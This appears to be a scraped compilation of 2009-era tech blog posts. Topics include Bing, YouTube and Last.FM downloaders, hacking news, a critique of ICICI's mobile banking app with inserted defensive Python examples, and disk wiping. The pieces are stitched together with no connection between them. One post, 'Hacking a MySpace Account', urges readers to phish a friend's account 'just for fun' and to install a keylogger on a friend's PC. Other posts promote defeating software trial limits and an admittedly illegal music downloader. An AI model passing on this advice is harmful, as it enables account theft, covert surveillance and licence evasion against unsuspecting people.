Microsoft’s new search engine that is expected to take on Google and Yahoo!

Bing is the name of Microsoft’s new search engine, which is expected to go live sometime next week. You can find overview documents and screenshot images of Bing here, while a video tour of the Bing.com service is available here.





Introducing Bing

You probably didn't wake up today expecting an entirely new search experience.

But — Bing! — here it is.

So, why a new search engine? Why the new name? Why now?

Well, because even though search is a pretty amazing thing, the current state of search engines has some equally amazing statistics.

So far in 2009, there are four and a half websites created EVERY SECOND as the web continues to expand. While more searchable information is cool, nearly half of all searches don’t result in the answer that people are seeking.

At the same time, the way the world searches is changing. You want more than just information. You want knowledge that leads to action.

The truth is you've evolved. It's time search caught up.

So we had an idea. Start over. And we did.

We took a new approach to go beyond search to build what we call a decision engine. With a powerful set of intuitive tools on top of a world class search service, Bing will help you make smarter, faster decisions. We included features that deliver the best results, presented in a more organized way to simplify key tasks and help you make important decisions faster.

And features like cashback, where we actually give you money back on great products, and Price Predictor, which actually tells you when to buy an airline ticket in order to help get you the best price — help you make smarter decisions, and put money back in your pocket.

We sincerely hope that the next time you need to make an important decision, you'll Bing and decide.

Thank you,

Bing Team, Microsoft

Send Ad Free SMS with your own Name as sender

Today, I got to know about a great service which lets you send free SMS over 10 countries. You don’t need to sign up. Your SMS will arrive guaranteed and there are no annoying ads either. The message can have up to 160 characters.

Homepage: my-cool-sms.com

Cool Features:

  • Free SMS

  • No sign up required

  • Messaging to 10 countries, including India

  • Ad free messaging

  • Display your own number in the sender

  • Secured by Captcha

Hackers Temporarily Seize Control Of Google Morocco Domain Name

Google.co.ma, the domain name for Google Morocco’s search portal, was taken hostage by hackers earlier today reportedly for several hours before the problem got fixed (it’s working fine again now). We got a bunch of tips about it, and the situation lasted long enough for lots of people to take screenshots of the website the domain name briefly pointed to due to the hack.

You can find loads of screenshots here and here, but the main domain name pointed to the website shown on top of this post.

There’s a bit of confusion about how exactly the hack was performed, but it appears as if the hackers found a way into NIC.ma, which controls the DNS for the country, and targeted the Google domain name specifically. The domain was pointed to a different server, and the web page above was shown when people tried to access the search engine. Google apparently at one point automatically relayed visitors from Morocco to Google.com instead of Google.co.ma, but it took a while to get the latter functioning correctly again.

PAKbugs.com leads to a forum where Pakistani hackers hang out, and the names on top of the web page above are all members of the message board. They’re being proud of it here.

This website (in French) claims that this isn’t the first such incident this year, as apparently the websites for Google Algeria and Google Puerto Rico were taken hostage by hackers last month too.

Download Music From Last.FM

You can listen to Last.FM on your iPhone, G1 and your PC/Mac, but you can’t have mp3 files. With Last.FM Downloader you can! It’s free and has no spyware or viruses.





FYI:

Last.FM Downloader is pretty much illegal to own because you are downloading songs that are copyrighted material, but I am sure you have P2P software such as LimeWire, Strong DC++, Kazaa etc…

Use it at your own risk.

Currently this is only supported in Windows.

Thanks for the link: NirmalTV

How To Download YouTube Videos or Convert To Mp3 3gp Mp4 Etc

These few websites provide great tools to download YouTube videos or convert them into MP3, AVI, 3GP or MP4 for iPhone and iPod.

1. KeepVid - Easy to use, and they also have a toolbar for easy YouTube video download.

2. WikiHow - Few methods that will give you enough info on how to download videos to iPod

3. Vixy - Best tool out there! Allows you to convert flv files online into mp3 or any other file you can think of!!

How to Use MSN Web Messenger with Hotmail Account

MSN Web Messenger is, as of today, integrated with your Hotmail account. You can basically use web MSN Messenger and talk to others while composing a new email.

To message someone, go to contacts, click on the person you would like to talk to and click on “Send an Instant Message (Available)”.

Or better yet, sign up with Gmail :)

Download and Sync YouTube Videos to iPod or iPhone

Here are some basic step by step guides that will show you how to download youtube videos to iPhone or iPod.

Best way to get FLV file from Youtube and convert for iPod or iPhone is via vixy.net. Works for Mac and Windows users.

Windows users can use AVS Video Converter that lets you convert FLV files to any file you can think of and it’s free too (see AVS4You)

Hope this short tutorial helps you get all the youtube videos you want on your iPhone or iPod Touch in our case.

How to Save Web Pages and Blogs for Offline Reading

Store Web Pages for Offline Viewing

If you have Google Desktop running in the background, you already have a local copy of all web pages that you have recently opened / read in any browser on your computer. You can click "Browse Timeline" inside Google Desktop and your web history will be listed in reverse chronological order - the most recently visited websites will be listed at the top.

The problem with web history in Google Desktop is that it can get cluttered too easily and finding relevant pages from the history may require some effort.  In that case you may install Scrapbook for Firefox and only save relevant web pages that you intend to read in an offline environment.

Scrapbook, like Google Notebook, is primarily for organizing web research but it’s an excellent offline browser as well. You can specify the depth level and all target links from the current web page (up to that level) will be saved offline automatically. For instance, say you want to read all stories on the CNN and BBC websites offline. Capture the home page with Scrapbook and set the depth as 1 - it will then save the full text of all the front page stories as well.

Scrapbook can export all the web captures as an HTML web page so you can easily read the saved content on a mobile phone or your PDA. Another popular tool for downloading web pages in Firefox is DownloadThemAll.

The limitation with either of the above tools is that they work only in Firefox and also require some manual work. What if you want to read all front page stories from all major news websites while offline? All news sites provide RSS feeds but they aren’t full text, so you have no option but to scrape content from the main website in order to read it offline.

HTTrack is a free website copying software where you can create download jobs and execute them whenever you go online. For example, you can create a single download job for all news websites (like BBC, NYT, etc.), set the depth limit as 1 and get an offline version of all the front page news stories in one go. You can also save this job and re-execute it anytime later, either manually or as a scheduled task.

Another good alternative to HTTrack is wget available for Mac, Windows and Linux. You don’t have to spend time learning the complicated command line switches of wget as there are nice GUI apps available both for Mac (CocoaWget) and Windows (WinWget).

Download Blogs for Offline Reading

Blogs, or websites that offer RSS feeds, are much easier to handle and save because we know exactly what stuff has changed since we last visited that site.

There are two categories of blog readers - (a) Addicts or people who are subscribed to several hundred feeds and want to read them all while offline and (b) Casual Readers or people who follow only a dozen or so feeds.

Casual readers can simply add their favorite feeds to Tabbloid and download them all as a PDF newsletter (example).

For people who fall in the category of addicts, the solution that will work best is a dedicated offline reader that can pre-fetch all the new articles and here are some good choices:

My first recommendation has always been FeedDemon - it’s fast, rich in features and the upcoming v2.8 is even better since it lets you export unread items as an HTML web page that can be read on any device.

If you are subscribed to feeds in Google Reader, you can try either RSS Bandit or Scoop - these are desktop based readers that work in offline mode and can synchronize with your Google Reader subscriptions. If you are on Bloglines, a similar solution for you exists in the form of GreatNews - a desktop RSS reader that is also portable. Google Gears is another solution for Google Reader users but it has limitations.

The advantage with either of the above solutions is that they all support synchronization - so if you mark an item as read in an offline environment, the change will get propagated when you go online next so there’s no double work.

Saving Blogs & Web Pages for Mobile Phones

If you plan to save web pages for offline viewing on a mobile device (with a small screen), I would recommend Web2Book - it not only downloads multiple web pages and blogs in one go but also converts them into formats like HTML or PDF that are supported on almost every mobile device.

Web pages saved with Web2Book can be easily read on ebook devices like the Microsoft Reader or the new Sony Reader. Another option for mobile devices is Plucker - it’s an offline browser available both for Windows Mobile and Palm based PDAs.

If you are an iPod owner (the old models, not the latest iPod touch), you can even turn your MP3 player into a notes reader and read web pages as plain text.

Drawloop, an online service that I mentioned in the previous Adobe PDF guide,  too can join multiple web pages and save them in a single PDF file like in this example where you have the home pages of three news websites saved in a single file.

source:labnol

Creates Auto-Starting Installer CDs for Any Applications

Windows only: Free app Install-It puts a small auto-starting application on any removable drive that makes installing applications a double-click affair.

After downloading the Install-It package, you'll want to extract its files to somewhere you can reach, like your desktop, and open up the Install.ini file in your favorite text editor. This file is simply a list of program descriptions and the locations of their installer files. If you're creating a disc full of useful installers, just replace the default examples with your chosen verbiage for each app and the location/names of the setup files. You separate those two items with a comma, using slashes where necessary, and end each line with a semi-colon.

Here's an example Install.ini I made for a supposed Windows XP re-installation:



Copy all your installer files and Install-It's files into a CD-burning app, such as CDBurnerXP, and fire away.

Now you've got a CD that, on most computers, will pop up with a list of programs that can be installed without anyone having to guess what each icon or cryptic filename means. If a computer isn't set to auto-start when it detects an autorun.inf file, though, you'll have to point the computer to install.exe, which is not a problem if you've put each application in its own directory.

Install-It is a free download for Windows systems only.

Install-It [via The Red Ferret Journal]

How To Identify Fonts Being Used In Images

Have you ever had trouble identifying which font is being used in an image? Of course, fonts used in popular movie banners can be found easily because you have the keyword, but what if you found a free template and the font is not included? You either recreate the buttons with your own fonts replacing the original, or try posting in forums and hope that someone has seen that font before and can tell you its name. There are so many fonts, maybe hundreds of thousands of fonts available on the internet, and identifying an unknown font is definitely NOT an easy task!

If you need to identify a font, don’t despair. I have found 2 methods that are able to help you identify an unknown font. If they are not able to help you identify the font, they will at least help you narrow it down to the closest ones.



Identifont, a free service offered to help you identify fonts by answering a series of simple questions about its appearance.
 
[ Identify Unknown Fonts with Identifont ]
 
Images can be color or black & white, and they don’t have to be very high quality (although that helps). Even a digital photograph of some lettering you like can be accepted. Accuracy of results is unprecedented by previous automatic systems. [ Identify Unknown Fonts with WhatTheFont ]

Finally, if WhatTheFont system is unable to give you a good match of the font you’re looking for, you can then submit your image to WhatTheFont Forum to have your image viewed by font geeks the world over.

3 Ways a Twitter Hack

Just days after popular social networking tool Twitter was hit by a phishing scam, the company is now trying to clean up a mess surrounding a separate hacking attack.
Over the weekend, some Twitter users received scam tweets, or direct messages, to visit certain sites or blogs. The URL in the message redirected users to a bogus login page in an attempt to steal login credentials for a phishing scheme. Monday, things got worse as Twitter officials revealed several high profile accounts, such as those of Britney Spears and Barack Obama, were hacked.



"It appears someone gained access to the tools Twitter uses to control its millions of accounts," explained Graham Cluley, a senior technology consultant at security firm Sophos PLC. "Internal tools used by the tech support team were compromised. It's not clear if it was an inside job, or outside hacker. Twitter does say they think it was an individual."

The hack, according to Cluley, is much more serious than the earlier phishing attack because it was a compromise of the system that potentially exposed all Twitter users to the following dangers.



Fraudulent password use

If you gain access to someone's Twitter account, you might be able to gain access to their password, said Cluley.

"We know that 41 percent of people admit to using the same password on every web site and account that they access," he said.

Hackers, while gaining access to something seemingly simple like a username and password to one account, may very well be able to use the information to gain access to more important information, such as your bank account.

Malware Infection

Twitter officials said 33 accounts had been attacked in the latest hack, including high-profile users such as Britney Spears and Barack Obama. The hackers used their temporary access to send offensive messages. CNN journalist Rick Sanchez found his account had been hacked with a message that read "i am high on crack right now might not be coming to work today."

The damage could have been much worse, said Cluley, if the hacker had decided to take a different approach.

"Imagine if instead, in the case of Britney Spears account for example, that the hacker had posted a link that said: 'Here's my new video. Click on this link.' Imagine how many people would have clicked on that and it could have pointed to malware? And Barack Obama is one of the most followed people on Twitter. If he said: 'I've just made a new speech. Check it out.' a lot of people would click on that link and get infected."



source:network world

Hacker opens gaping holes in CSAT score security

As the investigation into the leak of college entrance exam results rolls on, prosecutors said yesterday that the computer server at the Korea Institute for Curriculum and Evaluation, which administers the exam, had been hacked over 200 times. Not only the test results but also the institute’s internal information was stolen.



According to prosecution and police sources, a manager at a public relations firm called Inuni Co. whose surname is Kim accessed the institute’s server over 200 times between August 2007 and December 2008.



A detention warrant was filed against Kim on charges of breaking information and network laws but it was rejected by the court.



Kim easily broke into the server. In August 2007, he accessed an employee’s e-mail account at the institute. Kim obtained the e-mail ID from a press release, and the password was the same as the ID.



Kim tried to log in to e-mail accounts of other institute employees over 50 times. One of his successes was with the account of someone in the institute’s administrative office. The employee used a password identical to the romanized spelling of his name.



One of the employee’s e-mails contained an attached file containing the passwords of five other employees at the institute. The employee temporarily managed the other employees’ e-mail access information because he dealt with changes in the institute’s server. Their passwords were identical to the last seven digits of their residential identification numbers.



In this way, Kim downloaded 16 types of internal information from the institute. Among the materials downloaded were plans to grade answer sheets from the 2009 College Scholastic Ability Test, scoring schedules and the number of students who missed the test.



“Kim could look at the Korea Institute for Curriculum and Evaluation’s internal information by accessing the e-mail of seven employees,” a prosecutor said.



Kim passed the information on to VisangEdu, a private education company. VisangEdu made the CSAT score analysis public on Dec. 9, a day before the CSAT results were announced.



Kim accessed the institute’s server four times on Dec. 10 after the institute requested a probe into this case.



As the investigation closed in on him, Kim destroyed a memo containing the IDs and passwords of the seven employees. Prosecutors plan to decide what kinds of charges they will file against Kim and a VisangEdu director whose surname is Jin this week.

Get things Insurance

This is a world of uncertainties and no one can guess what may happen the next moment. To be frank, you should not think that this is a way of looking at things from a negative point of view. This is a step for being cautious. For instance, you might have put in a good part of your savings and bought your dream car. It is also very important to get car insurance, as it will help you get cover and get reimbursements in case some unforeseen things happen. If you are looking to get cheap car insurance then Maczoop is the perfect destination for you. The site helps you to get various quotes, compare and contrast them and then choose the one which best fits your requirements. They have also got some valuable information and tips on auto insurance, and this will be very helpful when you are going to take one. Get things insured and stay secure!

Dissecting iMobile - Security Analysis of ICICI Mobile Banking App

ICICI Bank’s iMobile website has some of the worst server side validations ever, which is what prompted me to download the mobile app’s JAR file, study it in detail and write this post. According to the website, until the Reserve Bank of India comes out with mobile banking guidelines and approves it, mobile banking is supposed to be halted. Technically, it means that all existing users shouldn’t be able to use the service whatsoever, new user signups should be prevented, and a notification stating that they should retry later should be shown.

Therefore, in this scenario, I shouldn’t have been able to download the app to my mobile device. The website of ICICI fails to enforce this, because the app can still be obtained in the following ways:

  1. Existing users who have already installed the app are given an option to ‘Upgrade’ from within the mobile app itself. This opens up a webpage in the phone’s native browser, whose URL is http://mobile.icicibank.com/upgrade?version=null.

  2. The actual iMobile website has some stupid javascript validation, which is very easy to bypass using modern browsers. Heck, just by browsing the HTML source code of the page, you will be able to easily find the URL for the application JAR files. Put 2 and 2 together and you will be able to download the app.

Which brings me to explain Step 2 in detail:
On any browser, go to View->Source. This will display the source code of the rendered HTML page. Notice the first script block. It contains many functions, and the most important functions to us are “submitForm” and “displayOption”. The line of interest in the submitForm method is document.jump1.action="https://infinity.icicibank.co.in/web/apps/"+fileName;. That line pretty much gives away everything. All you have to do is navigate to the above mentioned URL and append a filename to it for download.

What filename do you have to give, and how?
That’s where our displayOption function is very useful. That function contains a set of simple If-Else conditional statements, which have the respective filenames. For example, if you want to download “M20P1520ALL1.jar”, then just append it to the URL and access it using the address bar. Therefore, the URL becomes https://infinity.icicibank.co.in/web/apps/M20P1520ALL1.jar. Being a JAR file, most browsers will display a “Save As” dialog box. Now, just download the file and transfer it to your mobile. The application is fairly straightforward.

Where ICICI Bank failed?
  1. They should have disabled the link mentioned in #1 above and replaced it with some text that says, “RBI mobile banking guidelines blah blah…”. But some clever users will bookmark the link to the JAR file and try to access the JAR file by bypassing the link itself. When they do that, the web server should return a “404 - Resource Not Found” error. Got it? Implementing this is pretty simple.

  2. There shouldn’t have been such a lot of useless javascript on the page. Firstly, they should have removed the device selection drop down box. Secondly, they should have replaced this page with an alternative. Thirdly, this mobile banking link should have been removed from the home page itself. Fourthly, they should have validated JAR file downloads on the server and should have displayed the “404 - Resource Not Found” error page.

  3. Ok. Leave aside #1 and #2. At least the mobile app should have thrown soft errors when users try to access mobile banking from the JavaME app. Any bank would store all activity data for a certain period of time. So when you access the bank’s service from a mobile device, the server software surely knows about it, which means the server software should have returned errors to the user instead of allowing the user to do transactions.

  4. There’s one more bug in the app itself. When you launch the app, it will prompt you to sync the data on the device to its servers for faster access the next time. When you click “OK” to synchronize, it will wait for a few minutes and show the message, “There is no data to synchronize”. When you proceed further and try to access your info, it will again prompt you to sync the data. That’s frustrating. Either you should sync the data properly or you should access the server every time over a secure channel. As simple as that. That’s not followed either.

For me, all these things imply only one thing. ICICI wants the existing users to continue using the app, thereby disobeying RBI’s orders, or they have some really bad programmers who don’t know what they are doing. At a time when people fear Google tracking their internet usage, this is MY/YOUR FINANCIAL INFORMATION which is at risk. Right?
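The server-side check asked for in the list above, as an added example (not ICICI's code and not from the original post): a WSGI application that decides on the server whether a JAR is served and answers 404 for everything else. The class name, the in-memory store, the suspension flag and the denial log are assumptions made for illustration; the URL prefix and filename are the ones quoted in the post.

```python
"""Added example: the download decision is made on the server, not in page script."""
from wsgiref.util import setup_testing_defaults

NOT_FOUND_BODY = b"404 - Resource Not Found"


class DownloadGate:
    """Hypothetical WSGI app guarding JAR downloads under one URL prefix."""

    def __init__(self, store, prefix="/web/apps/", suspended=False):
        self.store = store          # filename -> bytes; stands in for files on disk
        self.prefix = prefix
        self.suspended = suspended  # server-side switch, e.g. service halted
        self.denied = []            # (path, reason) records for later review

    def decide(self, path):
        """Return (status, content_type, body) for a requested path."""
        if self.suspended:
            return self._deny(path, "service suspended")
        if not path.startswith(self.prefix):
            return self._deny(path, "outside download prefix")
        name = path[len(self.prefix):]
        # Exact-match lookup in an allowlist: a name containing "/" or ".."
        # never equals a published filename, so it is refused here.
        body = self.store.get(name)
        if body is None:
            return self._deny(path, "not a published file")
        return "200 OK", "application/java-archive", body

    def _deny(self, path, reason):
        self.denied.append((path, reason))
        # Every refusal looks the same, so a bookmarked URL reveals nothing.
        return "404 Not Found", "text/plain", NOT_FOUND_BODY

    def __call__(self, environ, start_response):
        status, ctype, body = self.decide(environ.get("PATH_INFO", ""))
        start_response(status, [("Content-Type", ctype),
                                ("Content-Length", str(len(body)))])
        return [body]


def fetch(app, path):
    """Drive the WSGI app in-process and return (status, body)."""
    environ = {"PATH_INFO": path, "REQUEST_METHOD": "GET"}
    setup_testing_defaults(environ)
    seen = {}

    def start_response(status, headers):
        seen["status"] = status

    body = b"".join(app(environ, start_response))
    return seen["status"], body


if __name__ == "__main__":
    # Constructed file content; only the filename comes from the post.
    store = {"M20P1520ALL1.jar": b"PK\x03\x04 constructed sample bytes"}
    for suspended in (True, False):
        gate = DownloadGate(store, suspended=suspended)
        for path in ("/web/apps/M20P1520ALL1.jar", "/web/apps/../secret.jar"):
            print(suspended, path, fetch(gate, path)[0])
```

Removing the link or the drop-down from the page changes nothing in this handler's answer, which is the property the client-side javascript validation lacks.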

That was a long post already. We still have some more to go. Let’s take a break.

Back? OK. Now, let’s dissect the actual JAR file and look into the technical details of its implementation.

The Manifest File:
Rename the .JAR extension to .ZIP and extract it to your favourite folder. Open the “META-INF” folder and open the “MANIFEST.MF” file in a text editor. As you will note, it contains lots of very valuable information, especially the socket URLs of various mobile service providers. The user agent is also very interesting: when sending HTTP requests through the application, it uses that property for setting the “user-agent” HTTP header. They also have debug strings enabled, which means that by snooping around using a good file manager for your mobile, you will be able to get technical errors, thereby letting us know how the app itself works, what requests it sends, its behaviour etc.

Another important item is, “MIDlet-Name” property in the manifest. This property determines what name the user sees after he installs the app on his mobile. Using the same name, when future upgrades are made available, the app is just replaced in place of the old one, which means, if you modify the “MIDlet-Name” property and install the app again, you will have 2 copies of the same app. THIS SHOULD NEVER BE ALLOWED FOR A HIGHLY CRITICAL FINANCIAL APPLICATION. Isn’t it? As an example, try changing the MIDlet-Name of the Yahoo! Go JAR file and try to install the app again on your mobile. My E51 shows an “Invalid JAR” error message because of MD5 sum checks etc.

Some more Holes:
Now, move back to the folder where the JAR file has been extracted. It contains a bunch of .class files. Pass them through a decompiler. You will get “perfect” Java source code files. The code looks obfuscated, but it’s not obfuscated enough. Anybody will be able to make good sense of the source code. All the URLs, all the used strings and everything else will be clearly visible. By using the app on your mobile side-by-side, you will easily be able to go through the source code. All in all, I wouldn’t use this app anymore until the security measures are tighter.

What should the bank do here?
  • Shouldn’t allow the installation of 2 apps of the same JAR with different names. Take this example of the Yahoo! Go JAR file.

  • I guess these mobile providers’ socket URLs are used on a one-time basis to send verification SMS. If that be the case, they shouldn’t be present in the manifest file for a variety of reasons that I won’t discuss here.

  • There’s an interesting property named “WSCDomainName” in the manifest file. I guess it expands to “Web Service Client Domain Name”, though I’m not sure about it. Suggestion: Encrypt the name value pairs.

  • Most importantly, sign the application using the Java Signed program. C’mon, users are doing financial transactions and a signed app will increase their confidence in using this application.
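A release-time check for the manifest problems described above, as an added example (not code from the original post or from the bank): it parses META-INF/MANIFEST.MF from a JAR and reports endpoint URLs, enabled debug switches and a missing signature. The sample JAR is constructed in memory; the keys Operator-Socket-URL, Debug-Enabled and User-Agent and all values are hypothetical, and the signature check tests only for the presence of jarsigner files or the MIDP JAD attribute MIDlet-Jar-RSA-SHA1, not their validity.

```python
"""Added example: audit a MIDlet JAR manifest before release."""
import io
import re
import zipfile

URL_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s,;]+", re.I)
DEBUG_KEY_RE = re.compile(r"debug|trace|verbose", re.I)
TRUTHY = {"true", "1", "yes", "on"}
SIGNATURE_FILE_RE = re.compile(r"^META-INF/[^/]+\.(?:SF|RSA|DSA|EC)$", re.I)
JAD_SIGNATURE_KEY = "MIDlet-Jar-RSA-SHA1"


def parse_manifest(text):
    """Parse the main section of a manifest (or a JAD) into a dict.

    A line starting with one space continues the previous value.
    """
    attrs, key = {}, None
    for line in text.splitlines():
        if not line.strip():
            if attrs:
                break        # a blank line ends the main section
            continue
        if line.startswith(" ") and key is not None:
            attrs[key] += line[1:]
        elif ":" in line:
            key, _, value = line.partition(":")
            key = key.strip()
            attrs[key] = value.lstrip(" ")
    return attrs


def audit_jar(jar_bytes, jad_text=""):
    """Return (manifest, findings); findings are (code, detail) tuples."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = jar.namelist()
        raw = jar.read("META-INF/MANIFEST.MF").decode("utf-8")
    manifest = parse_manifest(raw)
    findings = []
    for key, value in manifest.items():
        for url in URL_RE.findall(value):
            findings.append(("endpoint-in-manifest", f"{key} -> {url}"))
        if DEBUG_KEY_RE.search(key) and value.strip().lower() in TRUTHY:
            findings.append(("debug-enabled", key))
    jar_signed = any(SIGNATURE_FILE_RE.match(n) for n in names)
    jad_signed = JAD_SIGNATURE_KEY in parse_manifest(jad_text)
    if not (jar_signed or jad_signed):
        findings.append(("unsigned", "no signature files and no JAD signature"))
    return manifest, findings


def build_sample_jar(signed=False):
    """Constructed sample input; every key value below is made up."""
    manifest = (
        "Manifest-Version: 1.0\r\n"
        "MIDlet-Name: Sample Banking App\r\n"
        "MIDlet-Version: 1.0.0\r\n"
        "MicroEdition-Profile: MIDP-2.0\r\n"
        "MicroEdition-Configuration: CLDC-1.1\r\n"
        "User-Agent: ExampleBank-MIDlet/1.0 (constructed sam\r\n"
        " ple value)\r\n"
        "WSCDomainName: ws.example.com\r\n"
        "Operator-Socket-URL: socket://sms-gw.example.net:9000\r\n"
        "Debug-Enabled: true\r\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", manifest)
        jar.writestr("Main.class", b"\xca\xfe\xba\xbe")
        if signed:
            # Placeholder files: the audit checks presence only.
            jar.writestr("META-INF/APP.SF", "Signature-Version: 1.0\r\n")
            jar.writestr("META-INF/APP.RSA", b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    _, results = audit_jar(build_sample_jar())
    for code, detail in results:
        print(f"{code}: {detail}")
```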

Suggestion for Users:
Users should install these kinds of apps on their mobile’s inbuilt memory, instead of the memory card. That is, when you connect your phone to the PC in thumb drive mode, all the RMS file stores for the mobile app are clearly visible. There are many decoders available on the internet that can read content from the RMS file stores. When you store this app on your mobile’s inbuilt memory, you can’t read those stores directly and there are a number of checks in place, that prevent reading it.

That’s about it!

Of course, this blog post can’t be termed as a full fledged security analysis. But most of what has been ignored by the bank are mere basics. They must have more secure systems in place.

How to open mobile websites on your PC browser

There are a number of use-cases for which you would want to browse a mobile-optimized website on your PC. When you visit the mobile website on your PC’s web browser, the website displays the full content, much to your dismay. However, when you visit the website on a mobile, it displays a perfectly mobile optimized page.


In these cases, there are some simple steps that you can follow to open mobile websites on your PC:



  1. Download and install the latest version of Firefox from http://www.getfirefox.com/.

  2. Visit Firefox Add-ons page and download the Modify Headers addon.

  3. Install the addon and restart firefox.

  4. From the firefox window, select “Tools” menu & click on “Modify Headers” option (Tools -> Modify Headers).

  5. The window will open as shown:

    Modify Headers Addon Window

  6. Below the title bar, there’s a drop down. Select “Add” from the drop down box.

  7. Now in the text box next to the drop down, type “user-agent”.

  8. In the third text box, paste this string - Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE51-1/100.34.20; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413.

  9. Click on “Save”.

  10. The screen should look as shown in the screenshot below:

    Filled screen of the addon

  11. Using the buttons on the Modify Headers addon window, you can enable or disable particular items.

  12. That’s it! Whenever you want to view a mobile website, just go to Tools->Modify Headers and enable the user agent you added in step 8. When you don’t need it, just open this window and disable it.

  13. You can close addon window after you have enabled/disabled items.

  14. Enjoy! :)

Hacking a MySpace Account


MySpace is one of the most widely used social networking websites among teenagers and adults across the globe. If you’re curious about hacking a MySpace account or preventing your MySpace account from being hacked, then this post is for you.


Here are some of the ways of hacking a MySpace account.


Phishing


Phishing is the most commonly used method to hack MySpace or any other email accounts. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. But once the user attempts to log in through these pages, his/her login details are stolen.


Phishing has proved to be the most effective way of hacking passwords and also has a high success rate. The reason for this is quite simple. The users are not aware of the phishing attack. Also, the users are fooled, since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun).


A detailed tutorial on phishing is discussed in the following two posts.


Hack Yahoo, Gmail or any other Password.
How to Create a Fake Login Page?

Spywares


The term spyware suggests software that secretly monitors the user’s behavior. Spyware programs can collect various types of personal information, such as Internet surfing habits, sites that have been visited, passwords and other sensitive information.


Keyloggers are the most widely used programs of this kind; they are nothing but spyware. If you want to hack your friend’s MySpace password, then all you have to do is just install a keylogger on your friend’s PC. Hacking a MySpace account using a keylogger is very easy, but also has some limitations.


For more information on keyloggers and their usage, refer to the following post:


Hacking an Email Account


Hacking Services


In most cases, hacking services are scams. Always ask for proof first before paying anything. I have tried many such hacking services (just to test them), but none of them have responded back. So personally I do not trust such services.


Please pass your comments and opinions….

How to Completely Erase a Hard Disk Drive

A new year has begun and perhaps you have decided to perform a system upgrade or get rid of your old computer system and purchase a new one. But before you sell or donate your old computer, it is very much necessary to completely erase your hard disk drive. Yes, every one of us is aware of this fact and so we delete the contents of the hard disk either by using the DELETE key on our keyboard or by formatting the hard disk.


Deleting and Formatting - Just Not Secure Enough


But the fact is, the data will still be on the hard disk even after deleting it or formatting the hard disk. Using the delete key on your keyboard will only remove the shortcuts to the files, making them invisible to users. Deleted files still reside on the hard drive, and a quick Google search will show many options for system recovery software that will allow anyone to reinstate that data.


Formatting the hard drive is a bit more secure way to erase the hard disk. Formatting a disk will not erase the data on the disk, only the address tables. It makes it much more difficult to recover the files. However a computer specialist would be able to recover most or all the data that was on the disk before the reformat. For those who accidentally reformat a hard disk, being able to recover most or all the data that was on the disk is a good thing. However, if you’re preparing a system for retirement to charity or any other organization, this obviously makes you more vulnerable to data theft.


Erasing the Hard Disk through DISK WIPING


So it is necessary for us to use a 100% secure way to erase the hard disk. The secure way of erasing the hard disk is called disk wiping. Disk wiping is a secure method of ensuring that data, including company and individually licensed software on your computer and storage devices, is irrecoverably deleted before recycling or donating the equipment. Because previously stored data can be brought back with the right software and applications, the disk wiping process will actually overwrite your entire hard drive with data, several times. Once you format, you’ll find it all but impossible to retrieve the data which was on the drive before the overwrite. The more times the disk is overwritten and formatted, the more secure the disk wipe is.


There are a variety of disk wiping products available that you can purchase or freely download online to perform more secure disk wipes. One of my favorite disk wiping tools is


WipeDrive/ WipeDrive Professional


You have to use this tool by burning the ISO image file onto a CD or by using a floppy disk. After burning this tool you have to boot your PC and follow the on-screen instructions to completely erase the hard disk.
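The difference between deleting, formatting and wiping, modelled on a small in-memory disk image. This is an added example, not part of the original post; the one-sector "address table" layout, the file names and the file contents are constructed for illustration.

```python
import os

SECTOR = 512
# File signatures that recovery software searches for in raw sectors
SIGNATURES = {b"%PDF-": "pdf", b"\xff\xd8\xff": "jpeg"}


def build_image():
    """Return a constructed 8-sector image: sector 0 is the address table."""
    image = bytearray(SECTOR * 8)
    files = [
        ("tax.pdf", 2, b"%PDF-1.4 constructed tax return, account 0000"),
        ("photo.jpg", 5, b"\xff\xd8\xff\xe0 constructed holiday photo"),
    ]
    table = ""
    for name, sector, data in files:
        image[sector * SECTOR:sector * SECTOR + len(data)] = data
        table += f"{name}:{sector}:{len(data)}\n"
    image[0:len(table)] = table.encode()
    return image


def _table_lines(image):
    raw = bytes(image[:SECTOR]).split(b"\x00", 1)[0]
    return raw.decode().splitlines()


def list_files(image):
    """What the operating system shows: names read from the address table."""
    return [line.split(":")[0] for line in _table_lines(image)]


def delete_file(image, name):
    """DELETE key: drop the table entry, leave the data sectors untouched."""
    kept = [line for line in _table_lines(image) if line.split(":")[0] != name]
    table = "".join(line + "\n" for line in kept).encode()
    image[:SECTOR] = table.ljust(SECTOR, b"\x00")


def quick_format(image):
    """Format: clear the address table only."""
    image[:SECTOR] = bytes(SECTOR)


def carve(image):
    """What recovery software does: ignore the table, scan the raw bytes."""
    hits = []
    for magic, kind in SIGNATURES.items():
        pos = image.find(magic)
        while pos != -1:
            hits.append((pos, kind))
            pos = image.find(magic, pos + 1)
    return sorted(hits)


def wipe(image, passes=3):
    """Disk wiping: overwrite every byte; the last pass writes zeros."""
    for _ in range(passes - 1):
        image[:] = os.urandom(len(image))
    image[:] = bytes(len(image))


if __name__ == "__main__":
    img = build_image()
    delete_file(img, "tax.pdf")
    print("after delete :", list_files(img), carve(img))
    quick_format(img)
    print("after format :", list_files(img), carve(img))
    wipe(img)
    print("after wipe   :", list_files(img), carve(img))
```

After the delete and the format the file listing shrinks, yet `carve` still locates both files by signature; only the overwrite leaves nothing to find.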

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack a piece of software and run the trial program forever. Most of us are familiar with programs that run only for a specified period of time in trial mode. Once the trial period has expired, these programs stop functioning and demand a purchase. But there is a way to run the software and make it function beyond the trial period. Isn’t this interesting?


Before I tell you how to hack the software and make it run in trial mode forever, we have to understand how such software works. I’ll try to explain this in brief.


When such software is installed for the first time, it makes an entry in the Windows Registry with details such as the installed date and time, installed path etc. After installation, every time you run the software it compares the current system date and time with the installed date and time. With this it can make out whether the trial period has expired or not.


So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small tool known as RunAsDate.


